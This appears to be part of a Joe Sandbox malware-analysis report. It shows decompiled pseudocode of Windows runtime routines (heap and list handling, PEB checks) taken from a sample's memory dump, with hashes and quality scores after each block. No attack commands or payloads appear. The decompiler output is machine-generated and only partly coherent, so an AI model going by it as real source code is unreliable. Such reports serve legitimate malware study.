                    				intOrPtr* _t30;
                    				intOrPtr* _t31;
                    				intOrPtr _t33;
                    				intOrPtr* _t34;
                    				intOrPtr* _t35;
                    				void* _t37;
                    				void* _t38;
                    				void* _t39;
                    				void* _t43;
                    
                    				_t39 = __eflags;
                    				_t35 = __edi;
                    				_push(8);
                    				_push(0x17408d0);
                    				E016BD08C(__ebx, __edi, __esi);
                    				_t37 = __ecx;
                    				E016F41E8(__ebx, __edi, __ecx, _t39);
                    				E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                    				_t18 = _t37 + 8;
                    				_t33 =  *_t18;
                    				_t27 =  *((intOrPtr*)(_t18 + 4));
                    				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                    					L8:
                    					_push(3);
                    					asm("int 0x29");
                    				} else {
                    					 *_t27 = _t33;
                    					 *((intOrPtr*)(_t33 + 4)) = _t27;
                    					_t35 = 0x17587e4;
                    					_t18 =  *0x17587e0; // 0x0
                    					while(_t18 != 0) {
                    						_t43 = _t18 -  *0x1755cd0; // 0xffffffff
                    						if(_t43 >= 0) {
                    							_t31 =  *0x17587e4; // 0x0
                    							_t18 =  *_t31;
                    							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                    								goto L8;
                    							} else {
                    								 *0x17587e4 = _t18;
                    								 *((intOrPtr*)(_t18 + 4)) = _t35;
                    								L01667055(_t31 + 0xfffffff8);
                    								_t24 =  *0x17587e0; // 0x0
                    								_t18 = _t24 - 1;
                    								 *0x17587e0 = _t18;
                    								continue;
                    							}
                    						}
                    						goto L9;
                    					}
                    				}
                    				L9:
                    				__eflags =  *0x1755cd0;
                    				if( *0x1755cd0 <= 0) {
                    					L01667055(_t37);
                    				} else {
                    					_t30 = _t37 + 8;
                    					_t34 =  *0x17587e8; // 0x0
                    					__eflags =  *_t34 - _t35;
                    					if( *_t34 != _t35) {
                    						goto L8;
                    					} else {
                    						 *_t30 = _t35;
                    						 *((intOrPtr*)(_t30 + 4)) = _t34;
                    						 *_t34 = _t30;
                    						 *0x17587e8 = _t30;
                    						 *0x17587e0 = _t18 + 1;
                    					}
                    				}
                    				 *(_t38 - 4) = 0xfffffffe;
                    				return E016BD0D1(L016F4320());
                    			}
















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b2d5ec4630f05f28823409ced5d2c4ddd9fc93f29fceed2a81e36387da0d9a7
                    • Instruction ID: a8d32973b5cf969622acef6031f2eba9b8d787704baa87870cc346f217ef99df
                    • Opcode Fuzzy Hash: 8b2d5ec4630f05f28823409ced5d2c4ddd9fc93f29fceed2a81e36387da0d9a7
                    • Instruction Fuzzy Hash: 6521AC78500702CFC725DFAAD940A15BBF2FF85328B10C6AEC2058BB99DB71D492CB06
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 29%
                    			E01692397(intOrPtr _a4) {
                    				void* __ebx;
                    				void* __ecx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t11;
                    				void* _t19;
                    				void* _t25;
                    				void* _t26;
                    				intOrPtr _t27;
                    				void* _t28;
                    				void* _t29;
                    
                    				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                    				if( *0x175848c != 0) {
                    					L0168FAD0(0x1758610);
                    					if( *0x175848c == 0) {
                    						E0168FA00(0x1758610, _t19, _t27, 0x1758610);
                    						goto L1;
                    					} else {
                    						_push(0);
                    						_push(_a4);
                    						_t26 = 4;
                    						_t29 = E01692581(0x1758610, 0x16450a0, _t26, _t27, _t28);
                    						E0168FA00(0x1758610, 0x16450a0, _t27, 0x1758610);
                    					}
                    				} else {
                    					L1:
                    					_t11 =  *0x1758614; // 0x0
                    					if(_t11 == 0) {
                    						_t11 = E016A4886(0x1641088, 1, 0x1758614);
                    					}
                    					_push(0);
                    					_push(_a4);
                    					_t25 = 4;
                    					_t29 = E01692581(0x1758610, (_t11 << 4) + 0x1645070, _t25, _t27, _t28);
                    				}
                    				if(_t29 != 0) {
                    					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                    					 *((char*)(_t29 + 0x40)) = 0;
                    				}
                    				return _t29;
                    			}
















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5dec6f9953da35fe783faf2d48d47d52292ac8319457bc5441f25e7a75fecd5d
                    • Instruction ID: 658312b27c4046c8532690cdd4cb0cc582198b4e2d9945ae7b1620f999c93702
                    • Opcode Fuzzy Hash: 5dec6f9953da35fe783faf2d48d47d52292ac8319457bc5441f25e7a75fecd5d
                    • Instruction Fuzzy Hash: 2711DF71744311B7EB30AA2A9C90B15B79DFB60760F14455EFE02D7251C6F0D841C799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E016E46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                    				signed short* _v8;
                    				unsigned int _v12;
                    				intOrPtr _v16;
                    				signed int _t22;
                    				signed char _t23;
                    				short _t32;
                    				void* _t38;
                    				char* _t40;
                    
                    				_v12 = __edx;
                    				_t29 = 0;
                    				_v8 = __ecx;
                    				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                    				_t38 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                    				if(_t38 != 0) {
                    					_t40 = _a4;
                    					 *_t40 = 1;
                    					E016AF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                    					_t22 = _v12 >> 1;
                    					_t32 = 0x2e;
                    					 *((short*)(_t38 + _t22 * 2)) = _t32;
                    					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                    					_t23 = E0169D268(_t38, 1);
                    					asm("sbb al, al");
                    					 *_t40 =  ~_t23 + 1;
                    					L016877F0(_v16, 0, _t38);
                    				} else {
                    					 *_a4 = 0;
                    					_t29 = 0xc0000017;
                    				}
                    				return _t29;
                    			}












                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                    • Instruction ID: 901204dd22f59c4e8df4b833bb5e2d9afd2f7212539e006c12003427ac80aa4a
                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                    • Instruction Fuzzy Hash: D311E572504208BBCB05AF6CDC809BEBBB9EF95314F1081AEF944C7351DA318D55D7A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 42%
                    			E0166C962(char __ecx) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t19;
                    				char _t22;
                    				void* _t26;
                    				void* _t27;
                    				char _t32;
                    				char _t34;
                    				void* _t35;
                    				void* _t37;
                    				intOrPtr* _t38;
                    				signed int _t39;
                    
                    				_t41 = (_t39 & 0xfffffff8) - 0xc;
                    				_v8 =  *0x175d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                    				_t34 = __ecx;
                    				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                    					_t26 = 0;
                    					E0167EEF0(0x17570a0);
                    					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                    					if(E016EF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                    						L9:
                    						E0167EB70(_t29, 0x17570a0);
                    						_t19 = _t26;
                    						L2:
                    						_pop(_t35);
                    						_pop(_t37);
                    						_pop(_t27);
                    						return E016AB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                    					}
                    					_t29 = _t34;
                    					_t26 = E016EF1FC(_t34, _t32);
                    					if(_t26 < 0) {
                    						goto L9;
                    					}
                    					_t38 =  *0x17570c0; // 0x0
                    					while(_t38 != 0x17570c0) {
                    						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                    						_t38 =  *_t38;
                    						_v12 = _t22;
                    						if(_t22 != 0) {
                    							_t29 = _t22;
                    							 *0x175b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                    							_v12();
                    						}
                    					}
                    					goto L9;
                    				}
                    				_t19 = 0;
                    				goto L2;
                    			}



















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1874ad5ec1a3fce4bdb113f7465f14cd2e14d71b348f323931f493272647f64
                    • Instruction ID: 5247d286b61c18f62a85e79163d31e7eaf101fcb8ba404790fffc835f6429fae
                    • Opcode Fuzzy Hash: e1874ad5ec1a3fce4bdb113f7465f14cd2e14d71b348f323931f493272647f64
                    • Instruction Fuzzy Hash: 6111E1327007169FC764AF6CDC95A2BBBE6BB84618B40066DE94583651DF70EC14CBD2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E016A37F5(void* __ecx, intOrPtr* __edx) {
                    				void* __ebx;
                    				void* __edi;
                    				signed char _t6;
                    				intOrPtr _t13;
                    				intOrPtr* _t20;
                    				intOrPtr* _t27;
                    				void* _t28;
                    				intOrPtr* _t29;
                    
                    				_t27 = __edx;
                    				_t28 = __ecx;
                    				if(__edx == 0) {
                    					E01682280(_t6, 0x1758550);
                    				}
                    				_t29 = E016A387E(_t28);
                    				if(_t29 == 0) {
                    					L6:
                    					if(_t27 == 0) {
                    						E0167FFB0(0x1758550, _t27, 0x1758550);
                    					}
                    					if(_t29 == 0) {
                    						return 0xc0000225;
                    					} else {
                    						if(_t27 != 0) {
                    							goto L14;
                    						}
                    						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                    						goto L11;
                    					}
                    				} else {
                    					_t13 =  *_t29;
                    					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                    						L13:
                    						_push(3);
                    						asm("int 0x29");
                    						L14:
                    						 *_t27 = _t29;
                    						L11:
                    						return 0;
                    					}
                    					_t20 =  *((intOrPtr*)(_t29 + 4));
                    					if( *_t20 != _t29) {
                    						goto L13;
                    					}
                    					 *_t20 = _t13;
                    					 *((intOrPtr*)(_t13 + 4)) = _t20;
                    					asm("btr eax, ecx");
                    					goto L6;
                    				}
                    			}












                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0698f175149da0747b5147b13cc42ba0242103f6c9de47b5ccfeef85dcb04e96
                    • Instruction ID: 508cf18ac10d64069f66952d6a60457f539bd68da55c5409c0c1cf67be84f278
                    • Opcode Fuzzy Hash: 0698f175149da0747b5147b13cc42ba0242103f6c9de47b5ccfeef85dcb04e96
                    • Instruction Fuzzy Hash: 4601D2B2A026119BC3379B1E9D40E26BBA6FF85A60B57406DE9498B315DB30CC01CBC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0169002D() {
                    				void* _t11;
                    				char* _t14;
                    				signed char* _t16;
                    				char* _t27;
                    				signed char* _t29;
                    
                    				_t11 = E01687D50();
                    				_t27 = 0x7ffe0384;
                    				if(_t11 != 0) {
                    					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    				} else {
                    					_t14 = 0x7ffe0384;
                    				}
                    				_t29 = 0x7ffe0385;
                    				if( *_t14 != 0) {
                    					if(E01687D50() == 0) {
                    						_t16 = 0x7ffe0385;
                    					} else {
                    						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    					}
                    					if(( *_t16 & 0x00000040) != 0) {
                    						goto L18;
                    					} else {
                    						goto L3;
                    					}
                    				} else {
                    					L3:
                    					if(E01687D50() != 0) {
                    						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    					}
                    					if( *_t27 != 0) {
                    						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                    							goto L5;
                    						}
                    						if(E01687D50() != 0) {
                    							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    						}
                    						if(( *_t29 & 0x00000020) == 0) {
                    							goto L5;
                    						}
                    						L18:
                    						return 1;
                    					} else {
                    						L5:
                    						return 0;
                    					}
                    				}
                    			}









                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                    • Instruction ID: fcd8ae14c8a016e0e0c6d21fc078b10cd13b907ae33092bb576a024f8d38194c
                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                    • Instruction Fuzzy Hash: EB118E32A05681CFEB229B28DD44B357B9DEF51754F1900A0ED148BB92EB38DC42C764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0167766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                    				char _v8;
                    				void* _t22;
                    				void* _t24;
                    				intOrPtr _t29;
                    				intOrPtr* _t30;
                    				void* _t42;
                    				intOrPtr _t47;
                    
                    				_push(__ecx);
                    				_t36 =  &_v8;
                    				if(E0169F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                    					L10:
                    					_t22 = 0;
                    				} else {
                    					_t24 = _v8 + __ecx;
                    					_t42 = _t24;
                    					if(_t24 < __ecx) {
                    						goto L10;
                    					} else {
                    						if(E0169F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                    							goto L10;
                    						} else {
                    							_t29 = _v8 + _t42;
                    							if(_t29 < _t42) {
                    								goto L10;
                    							} else {
                    								_t47 = _t29;
                    								_t30 = _a16;
                    								if(_t30 != 0) {
                    									 *_t30 = _t47;
                    								}
                    								if(_t47 == 0) {
                    									goto L10;
                    								} else {
                    									_t22 = L01684620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _t22;
                    			}











                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                    • Instruction ID: 058afe60765666a6444c633afdba661cb389a062e86730d2810a3d830be3dcaf
                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                    • Instruction Fuzzy Hash: A801AC32700129ABDB20DE5ECC45E5B7BADEB84660F350564BA08CB254DA30DD01C7A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E01669080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                    				intOrPtr* _t51;
                    				intOrPtr _t59;
                    				signed int _t64;
                    				signed int _t67;
                    				signed int* _t71;
                    				signed int _t74;
                    				signed int _t77;
                    				signed int _t82;
                    				intOrPtr* _t84;
                    				void* _t85;
                    				intOrPtr* _t87;
                    				void* _t94;
                    				signed int _t95;
                    				intOrPtr* _t97;
                    				signed int _t99;
                    				signed int _t102;
                    				void* _t104;
                    
                    				_push(__ebx);
                    				_push(__esi);
                    				_push(__edi);
                    				_t97 = __ecx;
                    				_t102 =  *(__ecx + 0x14);
                    				if((_t102 & 0x02ffffff) == 0x2000000) {
                    					_t102 = _t102 | 0x000007d0;
                    				}
                    				_t48 =  *[fs:0x30];
                    				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                    					_t102 = _t102 & 0xff000000;
                    				}
                    				_t80 = 0x17585ec;
                    				E01682280(_t48, 0x17585ec);
                    				_t51 =  *_t97 + 8;
                    				if( *_t51 != 0) {
                    					L6:
                    					return E0167FFB0(_t80, _t97, _t80);
                    				} else {
                    					 *(_t97 + 0x14) = _t102;
                    					_t84 =  *0x175538c; // 0x77576828
                    					if( *_t84 != 0x1755388) {
                    						_t85 = 3;
                    						asm("int 0x29");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_push(0x2c);
                    						_push(0x173f6e8);
                    						E016BD0E8(0x17585ec, _t97, _t102);
                    						 *((char*)(_t104 - 0x1d)) = 0;
                    						_t99 =  *(_t104 + 8);
                    						__eflags = _t99;
                    						if(_t99 == 0) {
                    							L13:
                    							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                    							if(__eflags == 0) {
                    								E017388F5(_t80, _t85, 0x1755388, _t99, _t102, __eflags);
                    							}
                    						} else {
                    							__eflags = _t99 -  *0x17586c0; // 0x12007b0
                    							if(__eflags == 0) {
                    								goto L13;
                    							} else {
                    								__eflags = _t99 -  *0x17586b8; // 0x0
                    								if(__eflags == 0) {
                    									goto L13;
                    								} else {
                    									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                    									__eflags =  *((char*)(_t59 + 0x28));
                    									if( *((char*)(_t59 + 0x28)) == 0) {
                    										E01682280(_t99 + 0xe0, _t99 + 0xe0);
                    										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                    										__eflags =  *((char*)(_t99 + 0xe5));
                    										if(__eflags != 0) {
                    											E017388F5(0x17585ec, _t85, 0x1755388, _t99, _t102, __eflags);
                    										} else {
                    											__eflags =  *((char*)(_t99 + 0xe4));
                    											if( *((char*)(_t99 + 0xe4)) == 0) {
                    												 *((char*)(_t99 + 0xe4)) = 1;
                    												_push(_t99);
                    												_push( *((intOrPtr*)(_t99 + 0x24)));
                    												E016AAFD0();
                    											}
                    											while(1) {
                    												_t71 = _t99 + 8;
                    												 *(_t104 - 0x2c) = _t71;
                    												_t80 =  *_t71;
                    												_t95 = _t71[1];
                    												 *(_t104 - 0x28) = _t80;
                    												 *(_t104 - 0x24) = _t95;
                    												while(1) {
                    													L19:
                    													__eflags = _t95;
                    													if(_t95 == 0) {
                    														break;
                    													}
                    													_t102 = _t80;
                    													 *(_t104 - 0x30) = _t95;
                    													 *(_t104 - 0x24) = _t95 - 1;
                    													asm("lock cmpxchg8b [edi]");
                    													_t80 = _t102;
                    													 *(_t104 - 0x28) = _t80;
                    													 *(_t104 - 0x24) = _t95;
                    													__eflags = _t80 - _t102;
                    													_t99 =  *(_t104 + 8);
                    													if(_t80 != _t102) {
                    														continue;
                    													} else {
                    														__eflags = _t95 -  *(_t104 - 0x30);
                    														if(_t95 !=  *(_t104 - 0x30)) {
                    															continue;
                    														} else {
                    															__eflags = _t95;
                    															if(_t95 != 0) {
                    																_t74 = 0;
                    																 *(_t104 - 0x34) = 0;
                    																_t102 = 0;
                    																__eflags = 0;
                    																while(1) {
                    																	 *(_t104 - 0x3c) = _t102;
                    																	__eflags = _t102 - 3;
                    																	if(_t102 >= 3) {
                    																		break;
                    																	}
                    																	__eflags = _t74;
                    																	if(_t74 != 0) {
                    																		L49:
                    																		_t102 =  *_t74;
                    																		__eflags = _t102;
                    																		if(_t102 != 0) {
                    																			_t102 =  *(_t102 + 4);
                    																			__eflags = _t102;
                    																			if(_t102 != 0) {
                    																				 *0x175b1e0(_t74, _t99);
                    																				 *_t102();
                    																			}
                    																		}
                    																		do {
                    																			_t71 = _t99 + 8;
                    																			 *(_t104 - 0x2c) = _t71;
                    																			_t80 =  *_t71;
                    																			_t95 = _t71[1];
                    																			 *(_t104 - 0x28) = _t80;
                    																			 *(_t104 - 0x24) = _t95;
                    																			goto L19;
                    																		} while (_t74 == 0);
                    																		goto L49;
                    																	} else {
                    																		_t82 = 0;
                    																		__eflags = 0;
                    																		while(1) {
                    																			 *(_t104 - 0x38) = _t82;
                    																			__eflags = _t82 -  *0x17584c0;
                    																			if(_t82 >=  *0x17584c0) {
                    																				break;
                    																			}
                    																			__eflags = _t74;
                    																			if(_t74 == 0) {
                    																				_t77 = E01739063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                    																				__eflags = _t77;
                    																				if(_t77 == 0) {
                    																					_t74 = 0;
                    																					__eflags = 0;
                    																				} else {
                    																					_t74 = _t77 + 0xfffffff4;
                    																				}
                    																				 *(_t104 - 0x34) = _t74;
                    																				_t82 = _t82 + 1;
                    																				continue;
                    																			}
                    																			break;
                    																		}
                    																		_t102 = _t102 + 1;
                    																		continue;
                    																	}
                    																	goto L20;
                    																}
                    																__eflags = _t74;
                    															}
                    														}
                    													}
                    													break;
                    												}
                    												L20:
                    												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                    												 *((char*)(_t99 + 0xe5)) = 1;
                    												 *((char*)(_t104 - 0x1d)) = 1;
                    												goto L21;
                    											}
                    										}
                    										L21:
                    										 *(_t104 - 4) = 0xfffffffe;
                    										E0166922A(_t99);
                    										_t64 = E01687D50();
                    										__eflags = _t64;
                    										if(_t64 != 0) {
                    											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    										} else {
                    											_t67 = 0x7ffe0386;
                    										}
                    										__eflags =  *_t67;
                    										if( *_t67 != 0) {
                    											_t67 = E01738B58(_t99);
                    										}
                    										__eflags =  *((char*)(_t104 - 0x1d));
                    										if( *((char*)(_t104 - 0x1d)) != 0) {
                    											__eflags = _t99 -  *0x17586c0; // 0x12007b0
                    											if(__eflags != 0) {
                    												__eflags = _t99 -  *0x17586b8; // 0x0
                    												if(__eflags == 0) {
                    													_t94 = 0x17586bc;
                    													_t87 = 0x17586b8;
                    													goto L27;
                    												} else {
                    													__eflags = _t67 | 0xffffffff;
                    													asm("lock xadd [edi], eax");
                    													if(__eflags == 0) {
                    														E01669240(_t80, _t99, _t99, _t102, __eflags);
                    													}
                    												}
                    											} else {
                    												_t94 = 0x17586c4;
                    												_t87 = 0x17586c0;
                    												L27:
                    												E01699B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                    											}
                    										}
                    									} else {
                    										goto L13;
                    									}
                    								}
                    							}
                    						}
                    						return E016BD130(_t80, _t99, _t102);
                    					} else {
                    						 *_t51 = 0x1755388;
                    						 *((intOrPtr*)(_t51 + 4)) = _t84;
                    						 *_t84 = _t51;
                    						 *0x175538c = _t51;
                    						goto L6;
                    					}
                    				}
                    			}




















                    0x016c3782
                    0x016c3787
                    0x016c3789
                    0x016c3790
                    0x016c3790
                    0x016c378b
                    0x016c378b
                    0x016c378b
                    0x016c3792
                    0x016c3795
                    0x00000000
                    0x016c3795
                    0x00000000
                    0x016c3779
                    0x016c3798
                    0x00000000
                    0x016c3798
                    0x00000000
                    0x016c3768
                    0x016c379b
                    0x016c379b
                    0x016c3751
                    0x016c3749
                    0x00000000
                    0x016c3740
                    0x016691a0
                    0x016691a3
                    0x016691a9
                    0x016691b0
                    0x00000000
                    0x016691b0
                    0x01669187
                    0x016691b4
                    0x016691b4
                    0x016691bb
                    0x016691c0
                    0x016691c5
                    0x016691c7
                    0x016c37da
                    0x016691cd
                    0x016691cd
                    0x016691cd
                    0x016691d2
                    0x016691d5
                    0x01669239
                    0x01669239
                    0x016691d7
                    0x016691db
                    0x016691e1
                    0x016691e7
                    0x016691fd
                    0x01669203
                    0x0166921e
                    0x01669223
                    0x00000000
                    0x01669205
                    0x01669205
                    0x01669208
                    0x0166920c
                    0x01669214
                    0x01669214
                    0x0166920c
                    0x016691e9
                    0x016691e9
                    0x016691ee
                    0x016691f3
                    0x016691f3
                    0x016691f3
                    0x016691e7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01669134
                    0x01669125
                    0x0166911d
                    0x0166914e
                    0x016690d1
                    0x016690d1
                    0x016690d3
                    0x016690d6
                    0x016690d8
                    0x00000000
                    0x016690d8
                    0x016690cf

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb96cbc9dbeb82213faa9412e4bce0b0ec0d22e5f0cb6b6fc0b222e81ccc178c
                    • Instruction ID: e6d31f2e0bbcbaf6ea186280345a0105a59e69eebf2d0239b5e058a702270e38
                    • Opcode Fuzzy Hash: eb96cbc9dbeb82213faa9412e4bce0b0ec0d22e5f0cb6b6fc0b222e81ccc178c
                    • Instruction Fuzzy Hash: C001AF726066048FD3259F18DC40B22BBADFB85328F25806EE9058B7A2C7B4DC41CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E016FC450(intOrPtr* _a4) {
                    				signed char _t25;
                    				intOrPtr* _t26;
                    				intOrPtr* _t27;
                    
                    				_t26 = _a4;
                    				_t25 =  *(_t26 + 0x10);
                    				if((_t25 & 0x00000003) != 1) {
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push( *((intOrPtr*)(_t26 + 8)));
                    					_push(0);
                    					_push( *_t26);
                    					E016A9910();
                    					_t25 =  *(_t26 + 0x10);
                    				}
                    				if((_t25 & 0x00000001) != 0) {
                    					_push(4);
                    					_t7 = _t26 + 4; // 0x4
                    					_t27 = _t7;
                    					_push(_t27);
                    					_push(5);
                    					_push(0xfffffffe);
                    					E016A95B0();
                    					if( *_t27 != 0) {
                    						_push( *_t27);
                    						E016A95D0();
                    					}
                    				}
                    				_t8 = _t26 + 0x14; // 0x14
                    				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                    				}
                    				_push( *_t26);
                    				E016A95D0();
                    				return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                    			}







                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                    • Instruction ID: 14166b6f24d93d9715c292671b8604db8bb64d4d0254a220fd771d589525d484
                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                    • Instruction Fuzzy Hash: 2401967114050ABFE711AF69CC80E62FB6EFF54354F504529F25442660C721ACA0CAA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E01734015(signed int __eax, signed int __ecx) {
                    				void* __ebx;
                    				void* __edi;
                    				signed char _t10;
                    				signed int _t28;
                    
                    				_push(__ecx);
                    				_t28 = __ecx;
                    				asm("lock xadd [edi+0x24], eax");
                    				_t10 = (__eax | 0xffffffff) - 1;
                    				if(_t10 == 0) {
                    					_t1 = _t28 + 0x1c; // 0x1e
                    					E01682280(_t10, _t1);
                    					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                    					E01682280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x17586ac);
                    					E0166F900(0x17586d4, _t28);
                    					E0167FFB0(0x17586ac, _t28, 0x17586ac);
                    					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                    					E0167FFB0(0, _t28, _t1);
                    					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                    					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                    						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                    					}
                    					_t10 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
